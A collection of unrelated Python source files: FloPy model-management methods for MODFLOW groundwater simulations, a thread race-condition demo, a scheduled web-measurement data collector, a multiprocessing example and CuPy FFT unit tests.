def namefile(self, namefile):
self._namefile = namefile
@property
def model_ws(self):
return self._model_ws
@model_ws.setter
def model_ws(self, model_ws):
self._model_ws = model_ws
@property
def exename(self):
return self._exename
@exename.setter
def exename(self, exename):
self._exename = exename
@property
def version(self):
return self._version
@version.setter
def version(self, version):
self._version = version
@property
def verbose(self):
return self._verbose
@verbose.setter
def verbose(self, verbose):
self._verbose = verbose
@property
def laytyp(self):
if self.get_package("LPF") is not None:
return self.get_package("LPF").laytyp.array
if self.get_package("BCF6") is not None:
return self.get_package("BCF6").laycon.array
if self.get_package("UPW") is not None:
return self.get_package("UPW").laytyp.array
return None
@property
def hdry(self):
if self.get_package("LPF") is not None:
return self.get_package("LPF").hdry
if self.get_package("BCF6") is not None:
return self.get_package("BCF6").hdry
if self.get_package("UPW") is not None:
return self.get_package("UPW").hdry
return None
@property
def hnoflo(self):
try:
bas6 = self.get_package("BAS6")
return bas6.hnoflo
except AttributeError:
return None
@property
def laycbd(self):
try:
dis = self.get_package("DIS")
return dis.laycbd.array
except AttributeError:
return None
# we don't need these - no need for controlled access to array_free_format
# def set_free_format(self, value=True):
# """
# Set the free format flag for the model instance
#
# Parameters
# ----------
# value : bool
# Boolean value to set free format flag for model. (default is True)
#
# Returns
# -------
#
# """
# if not isinstance(value, bool):
# print('Error: set_free_format passed value must be a boolean')
# return False
# self.array_free_format = value
#
# def get_free_format(self):
# """
# Return the free format flag for the model
#
# Returns
# -------
# out : bool
# Free format flag for the model
#
# """
# return self.array_free_format
def next_unit(self, i=None):
if i is not None:
self.__onunit__ = i - 1
else:
self.__onunit__ += 1
return self.__onunit__
def next_ext_unit(self):
"""
Function to encapsulate next_ext_unit attribute
"""
next_unit = self._next_ext_unit + 1
self._next_ext_unit += 1
return next_unit
def export(self, f, **kwargs):
"""
Method to export a model to netcdf or shapefile based on the
extension of the file name (.shp for shapefile, .nc for netcdf)
Parameters
----------
f : str
filename
kwargs : keyword arguments
modelgrid : flopy.discretization.Grid instance
user supplied modelgrid which can be used for exporting
in lieu of the modelgrid associated with the model object
Returns
-------
None or Netcdf object
"""
from .export import utils
return utils.model_export(f, self, **kwargs)
def add_package(self, p):
"""
Add a package.
Parameters
----------
p : Package object
"""
for idx, u in enumerate(p.unit_number):
if u != 0:
if u in self.package_units or u in self.external_units:
try:
pn = p.name[idx]
except:
pn = p.name
if self.verbose:
print(
f"\nWARNING:\n unit {u} of package {pn} already in use."
)
self.package_units.append(u)
for i, pp in enumerate(self.packagelist):
if pp.allowDuplicates:
continue
elif isinstance(p, type(pp)):
if self.verbose:
print(
"\nWARNING:\n Two packages of the same type, "
f"Replacing existing '{p.name[0]}' package."
)
self.packagelist[i] = p
return
if self.verbose:
print("adding Package: ", p.name[0])
self.packagelist.append(p)
def remove_package(self, pname):
"""
Remove a package from this model
Parameters
----------
pname : string
Name of the package, such as 'RIV', 'BAS6', etc.
"""
for i, pp in enumerate(self.packagelist):
if pname.upper() in pp.name:
if self.verbose:
print("removing Package: ", pp.name)
# Remove the package object from the model's packagelist
p = self.packagelist.pop(i)
# Remove the package unit number from the list of package
# units stored with the model
for iu in p.unit_number:
if iu in self.package_units:
self.package_units.remove(iu)
return
raise StopIteration(
"Package name " + pname + " not found in Package list"
)
def __getattr__(self, item):
"""
__getattr__ - syntactic sugar
Parameters
----------
item : str
3 character package name (case insensitive) or "sr" to access
the SpatialReference instance of the ModflowDis object
Returns
-------
sr : SpatialReference instance
pp : Package object
Package object of type :class:`flopy.pakbase.Package`
Note
----
if self.dis is not None, then the spatial reference instance is updated
using self.dis.delr, self.dis.delc, and self.dis.lenuni before being
returned
"""
if item == "output_packages" or not hasattr(self, "output_packages"):
raise AttributeError(item)
if item == "tr":
if self.dis is not None:
return self.dis.tr
else:
return None
if item == "start_datetime":
if self.dis is not None:
return self.dis.start_datetime
else:
return None
# return self.get_package(item)
# to avoid infinite recursion
if item == "_packagelist" or item == "packagelist":
raise AttributeError(item)
pckg = self.get_package(item)
if pckg is not None or item in self.mfnam_packages:
return pckg
if item == "modelgrid":
return
raise AttributeError(item)
def get_ext_dict_attr(
self, ext_unit_dict=None, unit=None, filetype=None, pop_key=True
):
iu = None
fname = None
if ext_unit_dict is not None:
for key, value in ext_unit_dict.items():
if key == unit:
iu = key
fname = os.path.basename(value.filename)
break
elif value.filetype == filetype:
iu = key
fname = os.path.basename(value.filename)
if pop_key:
self.add_pop_key_list(iu)
break
return iu, fname
def _output_msg(self, i, add=True):
if add:
txt1 = "Adding"
txt2 = "to"
else:
txt1 = "Removing"
txt2 = "from"
print(
f"{txt1} {self.output_fnames[i]} (unit={self.output_units[i]}) "
f"{txt2} the output list."
)
def add_output_file(
self, unit, fname=None, extension="cbc", binflag=True, package=None
):
"""
Add an ascii or binary output file for a package
Parameters
----------
unit : int
unit number of external array
fname : str
filename of external array. (default is None)
extension : str
extension to use for the cell-by-cell file. Only used if fname
is None. (default is cbc)
binflag : bool
boolean flag indicating if the output file is a binary file.
Default is True
package : str
string that defines the package the output file is attached to.
Default is None
"""
add_cbc = False
if unit > 0:
add_cbc = True
# determine if the file is in external_units
if abs(unit) in self.external_units:
idx = self.external_units.index(abs(unit))
if fname is None:
fname = os.path.basename(self.external_fnames[idx])
binflag = self.external_binflag[idx]
self.remove_external(unit=abs(unit))
# determine if the unit exists in the output data
if abs(unit) in self.output_units:
add_cbc = False
idx = self.output_units.index(abs(unit))
# determine if binflag has changed
if binflag is not self.output_binflag[idx]:
add_cbc = True
if add_cbc:
self.remove_output(unit=abs(unit))
else:
if package is not None:
self.output_packages[idx].append(package)
if add_cbc:
if fname is None:
fname = f"{self.name}.{extension}"
# check if this file name exists for a different unit number
if fname in self.output_fnames:
idx = self.output_fnames.index(fname)
iut = self.output_units[idx]
if iut != unit:
# include unit number in fname if package has
# not been passed
if package is None:
fname = f"{self.name}.{unit}.{extension}"
# include package name in fname
else:
fname = f"{self.name}.{package}.{extension}"
else:
fname = os.path.basename(fname)
self.add_output(fname, unit, binflag=binflag, package=package)
return
def add_output(self, fname, unit, binflag=False, package=None):
"""
Assign an external array so that it will be listed as a DATA or
DATA(BINARY) entry in the name file. This will allow an outside
file package to refer to it.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
binflag : boolean
binary or not. (default is False)
"""
if fname in self.output_fnames:
if self.verbose:
print(
"BaseModel.add_output() warning: "
f"replacing existing filename {fname}"
)
idx = self.output_fnames.index(fname)
if self.verbose:
self._output_msg(idx, add=False)
self.output_fnames.pop(idx)
self.output_units.pop(idx)
self.output_binflag.pop(idx)
self.output_packages.pop(idx)
self.output_fnames.append(fname)
self.output_units.append(unit)
self.output_binflag.append(binflag)
if package is not None:
self.output_packages.append([package])
else:
self.output_packages.append([])
if self.verbose:
self._output_msg(-1, add=True)
return
def remove_output(self, fname=None, unit=None):
"""
Remove an output file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
if self.verbose:
self._output_msg(i, add=False)
self.output_fnames.pop(i)
self.output_units.pop(i)
self.output_binflag.pop(i)
self.output_packages.pop(i)
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
if self.verbose:
self._output_msg(i, add=False)
self.output_fnames.pop(i)
self.output_units.pop(i)
self.output_binflag.pop(i)
self.output_packages.pop(i)
else:
msg = " either fname or unit must be passed to remove_output()"
raise Exception(msg)
return
def get_output(self, fname=None, unit=None):
"""
Get an output file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
return self.output_units[i]
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
return self.output_fnames[i]
return None
else:
msg = " either fname or unit must be passed to get_output()"
raise Exception(msg)
return
def set_output_attribute(self, fname=None, unit=None, attr=None):
"""
Set a variable in an output file from the model by specifying either
the file name or the unit number and a dictionary with attributes
to change.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
idx = None
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
idx = i
break
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
idx = i
break
else:
msg = (
" either fname or unit must be passed "
"to set_output_attribute()"
)
raise Exception(msg)
if attr is not None:
if idx is not None:
for key, value in attr.items:
if key == "binflag":
self.output_binflag[idx] = value
elif key == "fname":
self.output_fnames[idx] = value
elif key == "unit":
self.output_units[idx] = value
return
def get_output_attribute(self, fname=None, unit=None, attr=None):
"""
Get a attribute for an output file from the model by specifying either
the file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
idx = None
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
idx = i
break
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
idx = i
break
else:
raise Exception(
" either fname or unit must be passed "
"to set_output_attribute()"
)
v = None
if attr is not None:
if idx is not None:
if attr == "binflag":
v = self.output_binflag[idx]
elif attr == "fname":
v = self.output_fnames[idx]
elif attr == "unit":
v = self.output_units[idx]
return v
def add_external(self, fname, unit, binflag=False, output=False):
"""
Assign an external array so that it will be listed as a DATA or
DATA(BINARY) entry in the name file. This will allow an outside
file package to refer to it.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
binflag : boolean
binary or not. (default is False)
"""
if fname in self.external_fnames:
if self.verbose:
print(
"BaseModel.add_external() warning: "
f"replacing existing filename {fname}"
)
idx = self.external_fnames.index(fname)
self.external_fnames.pop(idx)
self.external_units.pop(idx)
self.external_binflag.pop(idx)
self.external_output.pop(idx)
if unit in self.external_units:
if self.verbose:
msg = f"BaseModel.add_external() warning: replacing existing unit {unit}"
print(msg)
idx = self.external_units.index(unit)
self.external_fnames.pop(idx)
self.external_units.pop(idx)
self.external_binflag.pop(idx)
self.external_output.pop(idx)
self.external_fnames.append(fname)
self.external_units.append(unit)
self.external_binflag.append(binflag)
self.external_output.append(output)
return
def remove_external(self, fname=None, unit=None):
"""
Remove an external file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
"""
plist = []
if fname is not None:
for i, e in enumerate(self.external_fnames):
if fname in e:
plist.append(i)
elif unit is not None:
for i, u in enumerate(self.external_units):
if u == unit:
plist.append(i)
else:
msg = " either fname or unit must be passed to remove_external()"
raise Exception(msg)
# remove external file
j = 0
for i in plist:
ipos = i - j
self.external_fnames.pop(ipos)
self.external_units.pop(ipos)
self.external_binflag.pop(ipos)
self.external_output.pop(ipos)
j += 1
return
def add_existing_package(
self, filename, ptype=None, copy_to_model_ws=True
):
"""
Add an existing package to a model instance.
Parameters
----------
filename : str
the name of the file to add as a package
ptype : optional
the model package type (e.g. "lpf", "wel", etc). If None,
then the file extension of the filename arg is used
copy_to_model_ws : bool
flag to copy the package file into the model_ws directory.
Returns
-------
None
"""
if ptype is None:
ptype = filename.split(".")[-1]
ptype = str(ptype).upper()
# for pak in self.packagelist:
# if ptype in pak.name:
# print("BaseModel.add_existing_package() warning: " +\
# "replacing existing package {0}".format(ptype))
class Obj:
pass
fake_package = Obj()
fake_package.write_file = lambda: None
fake_package.extra = [""]
fake_package.name = [ptype]
fake_package.extension = [filename.split(".")[-1]]
fake_package.unit_number = [self.next_ext_unit()]
if copy_to_model_ws:
base_filename = os.path.split(filename)[-1]
fake_package.file_name = [base_filename]
shutil.copy2(filename, os.path.join(self.model_ws, base_filename))
else:
fake_package.file_name = [filename]
fake_package.allowDuplicates = True
self.add_package(fake_package)
def get_name_file_entries(self):
"""
Get a string representation of the name file.
Parameters
----------
"""
lines = []
for p in self.packagelist:
for i in range(len(p.name)):
if p.unit_number[i] == 0:
continue
s = f"{p.name[i]:14s} {p.unit_number[i]:5d} {p.file_name[i]}"
if p.extra[i]:
s += " " + p.extra[i]
lines.append(s)
return "\n".join(lines) + "\n"
def has_package(self, name):
"""
Check if package name is in package list.
Parameters
----------
name : str
Name of the package, 'DIS', 'BAS6', etc. (case-insensitive).
Returns
-------
bool
True if package name exists, otherwise False if not found.
"""
if not name:
raise ValueError("invalid package name")
name = name.upper()
for p in self.packagelist:
for pn in p.name:
if pn.upper() == name:
return True
return False
def get_package(self, name):
"""
Get a package.
Parameters
----------
name : str
Name of the package, 'RIV', 'LPF', etc. (case-insensitive).
Returns
-------
pp : Package object
Package object of type :class:`flopy.pakbase.Package`
"""
if not name:
raise ValueError("invalid package name")
name = name.upper()
for pp in self.packagelist:
if pp.name[0].upper() == name:
return pp
return None
def set_version(self, version):
self.version = version.lower()
# check that this is a valid model version
if self.version not in list(self.version_types.keys()):
err = (
f"Error: Unsupported model version ({self.version}). "
"Valid model versions are:"
)
for v in list(self.version_types.keys()):
err += f" {v}"
raise Exception(err)
# set namefile heading
self.heading = (
f"# Name file for {self.version_types[self.version]}, "
f"generated by Flopy version {__version__}."
)
# set heading for each package
for p in self.get_package_list():
pak = self.get_package(p)
if hasattr(pak, "heading"):
pak._generate_heading()
return None
def change_model_ws(self, new_pth=None, reset_external=False):
"""
Change the model work space.
Parameters
----------
new_pth : str
Location of new model workspace. If this path does not exist,
it will be created. (default is None, which will be assigned to
the present working directory).
Returns
-------
val : list of strings
Can be used to see what packages are in the model, and can then
be used with get_package to pull out individual packages.
"""
if new_pth is None:
new_pth = os.getcwd()
if not os.path.exists(new_pth):
try:
print(f"\ncreating model workspace...\n {new_pth}")
os.makedirs(new_pth)
except:
raise OSError(f"{new_pth} not valid, workspace-folder")
# line = '\n{} not valid, workspace-folder '.format(new_pth) + \
# 'was changed to {}\n'.format(os.getcwd())
# print(line)
# new_pth = os.getcwd()
# --reset the model workspace
old_pth = self._model_ws
self._model_ws = new_pth
if self.verbose:
print(f"\nchanging model workspace...\n {new_pth}")
# reset the paths for each package
for pp in self.packagelist:
pp.fn_path = os.path.join(self.model_ws, pp.file_name[0])
# create the external path (if needed)
if (
hasattr(self, "external_path")
and self.external_path is not None
and not os.path.exists(
os.path.join(self._model_ws, self.external_path)
)
):
pth = os.path.join(self._model_ws, self.external_path)
os.makedirs(pth)
if reset_external:
self._reset_external(pth, old_pth)
elif reset_external:
self._reset_external(self._model_ws, old_pth)
return None
def _reset_external(self, pth, old_pth):
new_ext_fnames = []
for ext_file, output in zip(
self.external_fnames, self.external_output
):
# new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1])
# this is a wicked mess
if output:
# new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1])
new_ext_file = ext_file
else:
# fpth = os.path.abspath(os.path.join(old_pth, ext_file))
# new_ext_file = os.path.relpath(fpth, os.path.abspath(pth))
fdir = os.path.dirname(ext_file)
if fdir == "":
fpth = os.path.abspath(os.path.join(old_pth, ext_file))
else:
fpth = ext_file
ao = os.path.abspath(os.path.dirname(fpth))
ep = os.path.abspath(pth)
relp = os.path.relpath(ao, ep)
new_ext_file = os.path.join(relp, os.path.basename(ext_file))
new_ext_fnames.append(new_ext_file)
self.external_fnames = new_ext_fnames
@property
def model_ws(self):
return copy.deepcopy(self._model_ws)
def _set_name(self, value):
"""
Set model name
Parameters
----------
value : str
Name to assign to model.
"""
self.__name = str(value)
self.namefile = self.__name + "." + self.namefile_ext
for p in self.packagelist:
for i in range(len(p.extension)):
p.file_name[i] = self.__name + "." + p.extension[i]
p.fn_path = os.path.join(self.model_ws, p.file_name[0])
def __setattr__(self, key, value):
if key == "free_format_input":
# if self.bas6 is not None:
# self.bas6.ifrefm = value
super().__setattr__(key, value)
elif key == "name":
self._set_name(value)
elif key == "model_ws":
self.change_model_ws(value)
elif key == "sr" and value.__class__.__name__ == "SpatialReference":
warnings.warn(
"SpatialReference has been deprecated.",
category=DeprecationWarning,
)
if self.dis is not None:
self.dis.sr = value
else:
raise Exception(
"cannot set SpatialReference - ModflowDis not found"
)
elif key == "tr":
assert isinstance(
value, discretization.reference.TemporalReference
)
if self.dis is not None:
self.dis.tr = value
else:
raise Exception(
"cannot set TemporalReference - ModflowDis not found"
)
elif key == "start_datetime":
if self.dis is not None:
self.dis.start_datetime = value
self.tr.start_datetime = value
else:
raise Exception(
"cannot set start_datetime - ModflowDis not found"
)
else:
super().__setattr__(key, value)
def run_model(
self,
silent=False,
pause=False,
report=False,
normal_msg="normal termination",
):
"""
This method will run the model using subprocess.Popen.
Parameters
----------
silent : boolean
Echo run information to screen (default is True).
pause : boolean, optional
Pause upon completion (default is False).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str
Normal termination message used to determine if the
run terminated normally. (default is 'normal termination')
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
return run_model(
self.exe_name,
self.namefile,
model_ws=self.model_ws,
silent=silent,
pause=pause,
report=report,
normal_msg=normal_msg,
)
def load_results(self):
print("load_results not implemented")
return None
def write_input(self, SelPackList=False, check=False):
"""
Write the input.
Parameters
----------
SelPackList : False or list of packages
"""
if check:
# run check prior to writing input
self.check(f=f"{self.name}.chk", verbose=self.verbose, level=1)
# reset the model to free_format if parameter substitution was
# performed on a model load
if self.parameter_load and not self.free_format_input:
if self.verbose:
print(
"\nResetting free_format_input to True to "
"preserve the precision of the parameter data."
)
self.free_format_input = True
if self.verbose:
print("\nWriting packages:")
if SelPackList == False:
for p in self.packagelist:
if self.verbose:
print(" Package: ", p.name[0])
# prevent individual package checks from running after
# model-level package check above
# otherwise checks are run twice
# or the model level check procedure would have to be split up
# or each package would need a check argument,
# or default for package level check would have to be False
try:
p.write_file(check=False)
except TypeError:
p.write_file()
else:
for pon in SelPackList:
for i, p in enumerate(self.packagelist):
if pon in p.name:
if self.verbose:
print(" Package: ", p.name[0])
try:
p.write_file(check=False)
except TypeError:
p.write_file()
break
if self.verbose:
print(" ")
# write name file
self.write_name_file()
# os.chdir(org_dir)
return
def write_name_file(self):
"""
Every Package needs its own writenamefile function
"""
raise Exception(
"IMPLEMENTATION ERROR: writenamefile must be overloaded"
)
def set_model_units(self):
"""
Every model needs its own set_model_units method
"""
raise Exception(
"IMPLEMENTATION ERROR: set_model_units must be overloaded"
)
@property
def name(self):
"""
Get model name
Returns
-------
name : str
name of model
"""
return copy.deepcopy(self.__name)
def add_pop_key_list(self, key):
"""
Add a external file unit number to a list that will be used to remove
model output (typically binary) files from ext_unit_dict.
Parameters
----------
key : int
file unit number
Returns
-------
Examples
--------
"""
if key not in self.pop_key_list:
self.pop_key_list.append(key)
def check(self, f=None, verbose=True, level=1):
"""
Check model data for common errors.
Parameters
----------
f : str or file handle
String defining file name or file handle for summary file
of check method output. If a string is passed a file handle
is created. If f is None, check method does not write
results to a summary file. (default is None)
verbose : bool
Boolean flag used to determine if check method results are
written to the screen
level : int
Check method analysis level. If level=0, summary checks are
performed. If level=1, full checks are performed.
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow.load('model.nam')
>>> m.check()
"""
# check instance for model-level check
chk = utils.check(self, f=f, verbose=verbose, level=level)
# check for unit number conflicts
package_units = {}
duplicate_units = {}
for p in self.packagelist:
for i in range(len(p.name)):
if p.unit_number[i] != 0:
if p.unit_number[i] in package_units.values():
duplicate_units[p.name[i]] = p.unit_number[i]
otherpackage = [
k
for k, v in package_units.items()
if v == p.unit_number[i]
][0]
duplicate_units[otherpackage] = p.unit_number[i]
if len(duplicate_units) > 0:
for k, v in duplicate_units.items():
chk._add_to_summary(
"Error", package=k, value=v, desc="unit number conflict"
)
else:
chk.passed.append("Unit number conflicts")
return self._check(chk, level)
def plot(self, SelPackList=None, **kwargs):
"""
Plot 2-D, 3-D, transient 2-D, and stress period list (MfList)
model input data
Parameters
----------
SelPackList : bool or list
List of of packages to plot. If SelPackList=None all packages
are plotted. (default is None)
**kwargs : dict
filename_base : str
Base file name that will be used to automatically generate file
names for output image files. Plots will be exported as image
files if file_name_base is not None. (default is None)
file_extension : str
Valid matplotlib.pyplot file extension for savefig(). Only used
if filename_base is not None. (default is 'png')
mflay : int
MODFLOW zero-based layer number to return. If None, then all
all layers will be included. (default is None)
kper : int
MODFLOW zero-based stress period number to return.
(default is zero)
key : str
MfList dictionary key. (default is None)
Returns
----------
axes : list
Empty list is returned if filename_base is not None. Otherwise
a list of matplotlib.pyplot.axis are returned.
See Also
--------
Notes
-----
Examples
--------
>>> import flopy
>>> ml = flopy.modflow.Modflow.load('test.nam')
>>> ml.plot()
"""
from flopy.plot import PlotUtilities
axes = PlotUtilities._plot_model_helper(
self, SelPackList=SelPackList, **kwargs
)
return axes
def to_shapefile(self, filename, package_names=None, **kwargs):
"""
Wrapper function for writing a shapefile for the model grid. If
package_names is not None, then search through the requested packages
looking for arrays that can be added to the shapefile as attributes
Parameters
----------
filename : string
name of the shapefile to write
package_names : list of package names (e.g. ["dis","lpf"])
Packages to export data arrays to shapefile. (default is None)
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow()
>>> m.to_shapefile('model.shp', SelPackList)
"""
warnings.warn("to_shapefile() is deprecated. use .export()")
self.export(filename, package_names=package_names)
return
def run_model(
exe_name,
namefile,
model_ws="./",
silent=False,
pause=False,
report=False,
normal_msg="normal termination",
use_async=False,
cargs=None,
):
"""
This function will run the model using subprocess.Popen. It
communicates with the model's stdout asynchronously and reports
progress to the screen with timestamps
Parameters
----------
exe_name : str
Executable name (with path, if necessary) to run.
namefile : str
Namefile of model to run. The namefile must be the
filename of the namefile without the path. Namefile can be None
to allow programs that do not require a control file (name file)
to be passed as a command line argument.
model_ws : str
Path to the location of the namefile. (default is the
current working directory - './')
silent : boolean
Echo run information to screen (default is True).
pause : boolean, optional
Pause upon completion (default is False).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str or list
Normal termination message used to determine if the
run terminated normally. More than one message can be provided using
a list. (Default is 'normal termination')
use_async : boolean
asynchronously read model stdout and report with timestamps. good for
models that take long time to run. not good for models that run
really fast
cargs : str or list of strings
additional command line arguments to pass to the executable.
Default is None
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
success = False
buff = []
# convert normal_msg to a list of lower case str for comparison
if isinstance(normal_msg, str):
normal_msg = [normal_msg]
for idx, s in enumerate(normal_msg):
normal_msg[idx] = s.lower()
# Check to make sure that program and namefile exist
exe = which(exe_name)
if exe is None:
import platform
if platform.system() in "Windows":
if not exe_name.lower().endswith(".exe"):
exe = which(exe_name + ".exe")
if exe is None:
raise Exception(
f"The program {exe_name} does not exist or is not executable."
)
else:
if not silent:
print(
f"FloPy is using the following executable to run the model: {exe}"
)
if namefile is not None:
if not os.path.isfile(os.path.join(model_ws, namefile)):
raise Exception(
f"The namefile for this model does not exists: {namefile}"
)
# simple little function for the thread to target
def q_output(output, q):
for line in iter(output.readline, b""):
q.put(line)
# time.sleep(1)
# output.close()
# create a list of arguments to pass to Popen
argv = [exe_name]
if namefile is not None:
argv.append(namefile)
# add additional arguments to Popen arguments
if cargs is not None:
if isinstance(cargs, str):
cargs = [cargs]
for t in cargs:
argv.append(t)
# run the model with Popen
proc = Popen(argv, stdout=PIPE, stderr=STDOUT, cwd=model_ws)
if not use_async:
while True:
line = proc.stdout.readline().decode("utf-8")
if line == "" and proc.poll() is not None:
break
if line:
for msg in normal_msg:
if msg in line.lower():
success = True
break
line = line.rstrip("\r\n")
if not silent:
print(line)
if report:
buff.append(line)
else:
break
return success, buff
# some tricks for the async stdout reading
q = Queue.Queue()
thread = threading.Thread(target=q_output, args=(proc.stdout, q))
thread.daemon = True
thread.start()
failed_words = ["fail", "error"]
last = datetime.now()
lastsec = 0.0
while True:
try:
line = q.get_nowait()
except Queue.Empty:
pass
else:
if line == "":
break
line = line.decode().lower().strip()
if line != "":
now = datetime.now()
dt = now - last
tsecs = dt.total_seconds() - lastsec
line = f"(elapsed:{tsecs})-->{line}"
lastsec = tsecs + lastsec
buff.append(line)
if not silent:
print(line)
for fword in failed_words:
if fword in line:
success = False
break
if proc.poll() is not None:
break
proc.wait()
thread.join(timeout=1)
buff.extend(proc.stdout.readlines())
proc.stdout.close()
for line in buff:
for msg in normal_msg:
if msg in line.lower():
print("success")
success = True
break
if pause:
input("Press Enter to continue...")
return success, buff
|
example1.py
|
import threading
import random
import time
def update():
global counter
current_counter = counter # reading in shared resource
time.sleep(random.randint(0, 1)) # simulating heavy calculations
counter = current_counter + 1 # updating shared resource
counter = 0
threads = [threading.Thread(target=update) for i in range(20)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
print(f"Final counter: {counter}.")
print("Finished.")
|
collect.py
|
# taaraxtak
# nick merrill
# 2021
#
# create-tables.py - defines the Postgres tables.
# this runs always.
import time
import schedule
import threading
import logging
from funcy import partial
from src.shared.utils import configure_logging
from src.w3techs.collect import collect as w3techs_collect
from src.ooni.collect import collect as ooni_collect
from config import config
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
#
# setup
#
configure_logging()
logger = logging.getLogger("taaraxtak:collect")
# connect to the db
postgres_config = config['postgres']
# configure scrapers for the db
w3techs = partial(w3techs_collect, postgres_config)
ooni = partial(ooni_collect, postgres_config)
#
# run
#
schedule.every().day.at('09:00').do(run_threaded, w3techs)
schedule.every(10).minutes.do(run_threaded, ooni)
while 1:
schedule.run_pending()
time.sleep(1)
|
process&thread_basics.py
|
from multiprocessing import Process
import time, os, threading
from threading import Thread
def learn(s):
print(f'学习{s}中,进程号:{os.getpid()},线程号:{threading.current_thread()}')
time.sleep(5)
print(f'学习{s}完毕,进程号:{os.getpid()},线程号:{threading.current_thread()}')
class_list = ['Optimization', 'Stochastic Models', 'Financial Derivatives', 'Investment Science',
'Introduction of Chinese Financial Market']
def multi_processes_example():
plist = []
for c in class_list:
# 创建进程
p = Process(target=learn, args=(c,))
# 生成线程
p.start()
# 创建的进程加入列表
plist.append(p)
[p.join() for p in plist]
def multi_threads_example():
tlist = []
for i in class_list:
# 创建进程
t = Thread(target=learn, args=(i,))
# 生成线程
t.start()
# 创建的进程加入列表
tlist.append(t)
[t.join() for t in tlist]
# multi_processes_example()
# multi_threads_example()
|
test_fft.py
|
import functools
import unittest
import pytest
import numpy as np
import cupy
from cupy import testing
from cupy.fft import config
from cupy.fft.fft import _default_fft_func, _fft, _fftn
def nd_planning_states(states=[True, False], name='enable_nd'):
"""Decorator for parameterized tests with and wihout nd planning
Tests are repeated with config.enable_nd_planning set to True and False
Args:
states(list of bool): The boolean cases to test.
name(str): Argument name to which specified dtypes are passed.
This decorator adds a keyword argument specified by ``name``
to the test fixture. Then, it runs the fixtures in parallel
by passing the each element of ``dtypes`` to the named
argument.
"""
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
# get original global planning state
planning_state = config.enable_nd_planning
try:
for nd_planning in states:
try:
# enable or disable nd planning
config.enable_nd_planning = nd_planning
kw[name] = nd_planning
impl(self, *args, **kw)
except Exception:
print(name, 'is', nd_planning)
raise
finally:
# restore original global planning state
config.enable_nd_planning = planning_state
return test_func
return decorator
def _size_last_transform_axis(shape, s, axes):
if s is not None:
if s[-1] is not None:
return s[-1]
elif axes is not None:
return shape[axes[-1]]
return shape[-1]
@testing.parameterize(*testing.product({
'n': [None, 0, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho', ''],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFft(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft alway returns np.complex128
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
# NumPy 1.17.0 and 1.17.1 raises ZeroDivisonError due to a bug
@testing.with_requires('numpy!=1.17.0')
@testing.with_requires('numpy!=1.17.1')
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(*testing.product({
'shape': [(10, 10), (10, 5, 10)],
'data_order': ['F', 'C'],
'axis': [0, 1, -1],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftOrder(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft(a, axis=self.axis)
# np.fft.fft alway returns np.complex128
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft(a, axis=self.axis)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.gpu
class TestDefaultPlanType(unittest.TestCase):
@nd_planning_states()
def test_default_fft_func(self, enable_nd):
# test cases where nd CUFFT plan is possible
ca = cupy.ones((16, 16, 16))
for axes in [(0, 1), (1, 2), None, (0, 1, 2)]:
fft_func = _default_fft_func(ca, axes=axes)
if enable_nd:
assert fft_func is _fftn
else:
assert fft_func is _fft
